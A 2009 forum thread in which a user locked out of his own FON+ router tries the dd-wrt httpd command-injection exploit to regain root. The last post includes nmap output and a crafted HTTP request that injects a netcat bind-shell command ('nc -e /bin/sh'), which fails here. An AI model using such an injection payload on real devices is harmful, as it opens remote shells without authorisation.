CrashZilla Posted July 24, 2009 Posted July 24, 2009 Hello all, I have played with the pinnapple project in the past and I have been side tracked for a while long story short I have for gotten the root password. Is there an easy way to reset the fon+ back to factory defaults or reset that password? I have tried holding down the reset button on the FON+ for over a minute waiting for the lights to flash but they never do. I have looked online and I guess I am not searching for it correctly but if you have any ideas that would be great. Let me know if you need specific information or am I out of luck? CrashZilla Quote
DingleBerries Posted July 24, 2009 Posted July 24, 2009 Why not try the httpd exploit for dd-wrt? I dont know if it will work but it is worth a try. Quote
CrashZilla Posted July 24, 2009 Author Posted July 24, 2009 I totally forgot about it came out on the 20th or something like that thanks dingleberries! I will let you know if I am successful. Quote
CrashZilla Posted July 29, 2009 Author Posted July 29, 2009 I am still having a few problems here is what I have tried. Let me know if you see something I am doing wrong.... I tried this but it hangs up at [*] Starting the payload handler... http://pauldotcom.com/2009/07/using-metasp...wrt-exploi.html Also I tried this compy:~ user$ nmap 192.168.1.1 Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds interesting ports on 192.168.1.1: Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 443/tcp open http compy:~ user$ nmap 192.168.1.1 -p 5555 Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-27 19:34 EDT Interesting ports on 192.168.1.1: PORT STATE SERVICE 5555/tcp closed freeciv compy:~ user$ nano test GET/cgi-bin/;nc$IFS\5555$IFS-e$IFS/bin/sh HTTP/1.0 host:192.168.1.1 compy:~ user$ cat test | nc 192.168.1.1 80 HTTP/1.0 400 Bad Request Server: httpd_gargoyle/1.0 14mar2008 Date: Sat, 01 Jan 2000 01:50:56 GMT Cache-Control: no-cache,no-store Content-Type: text/html; charset=%s Connection: close <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H4>400 Bad Request</H4> Bad filename. <HR> <ADDRESS><A HREF="http://www.gargoyle-router.com">httpd_gargoyle/1.0 14mar2008</A></ADDRESS> </BODY> </HTML> compy:~ user$ nmap 192.168.1.1 -p 5555 Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-27 19:34 EDT Interesting ports on 192.168.1.1: PORT STATE SERVICE 5555/tcp closed freeciv Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.